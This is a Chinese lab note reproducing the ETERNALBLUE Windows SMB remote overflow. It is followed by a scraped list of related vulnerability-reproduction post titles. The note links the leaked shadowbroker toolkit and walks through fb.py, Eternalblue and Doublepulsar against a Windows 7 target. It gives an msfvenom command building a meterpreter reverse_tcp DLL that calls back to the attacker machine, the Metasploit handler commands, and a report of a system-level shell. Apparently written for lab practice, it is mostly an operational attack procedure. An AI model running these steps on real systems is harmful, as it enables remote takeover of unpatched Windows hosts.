方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
0x01 环境搭建
- win2003 攻击机,ip:192.168.0.28
- kali 攻击机,ip:192.168.0.27
- win7 靶机,ip:192.168.0.14;netstat -an 查看端口开发情况,确保445端口开启
- 另外:win2003攻击机需要有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。
- 方程式ETERNALBLUE 下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。
- 在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致
0x02 测试过程
- 进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。
- 根据提示,输入0创建一个新的项目,项目名为test
- 接下来使用use Eternalblue,一路回车:
- 这里要注意,根据提示选项,这里选择1,然后继续一路回车
- 在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=5555 -f dll > /opt/s.dll
- 在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.0.27
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
- 接下来继续在windows2003上执行use Doublepulsar
- 根据提示选择对应系统,运行dll文件,设置dll文件路径
- 最后在MSF中可以看到,成功反弹shell,拿到系统权限。
0x03 参考文档
- TOOLS文章:http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374058&idx=1&sn=2ac09acae4fe70ca80446c3385feb90c&chksm=beb07c1689c7f500cad4fb3f8e2e76f31220b569ef3617e440dacb6cbe646958065ec9493f37&mpshare=1&scene=23&srcid=0416plWIdYQXxZ61ZUEd2foy#rd
- 边界安全文章:http://mp.weixin.qq.com/s?__biz=MzI0MzQyNzI2OA==&mid=2247484335&idx=1&sn=b5ad15e967aa13a729ee3c5890320038&chksm=e96c7104de1bf81216500f50a62a335579916b32d7ccf8b94402922fa97bb005faceea876b52&mpshare=1&scene=23&srcid=0416ztWMmZGOSUjFbBMED29b#rd
方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记相关推荐
- MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...
- 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...
- 利用MS08067远程溢出漏洞抓肉鸡
利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...
- 一步到位的 UPnP 远程溢出漏洞实战
远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...
- Windows Print Spooler CVE-2021-1675 漏洞复现
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Wi ...
- Microsoft Windows SMB信息泄露漏洞
受影响系统: Microsoft Windows Server 20H2 (Server Core Insta Microsoft Windows Server 2022 (Server Core i ...
- linux远程溢出,Linux netkit in.telnetd远程溢出漏洞
Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...
- 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...
- 网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
一.漏洞原理简介 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时, ...
最新文章
- 微软低调发布 Web 版本的 Visual Studio Code 预览
- 最新网络工程师考试大纲
- hdu 1046 完数
- Java - 错误: quot;java.lang.ArrayIndexOutOfBoundsException: length=1; index=1quot;
- ((ios开发学习笔记 十))代码实现自定义TableView
- Python中常用的高阶函数
- 怎么通过邮箱发超大附件?介绍一种基于云服务的方法
- WebService 之 WSDL文件 讲解
- Oracle 备份与还原
- ubuntu执行configure配置代码出现unable to guess system type报错
- Python pip windows安装
- 企业多园区统一灾备建设最佳实践
- c语言编程实现电脑关机,C语言让电脑关机?system函数功能够大够硬
- java小球落体问题_小球落体 -- 算法Java
- dpdk加速网络协议栈ANS用户手册
- 分区表的概念、优点以及类型
- autoexec.bat文件的所在位置
- ue4 获取屏幕中心点坐标
- 添加航班信息c语言,c语言编写航班查询代码
- oracle 删除后恢复,Oracle快速恢复误删数据的方法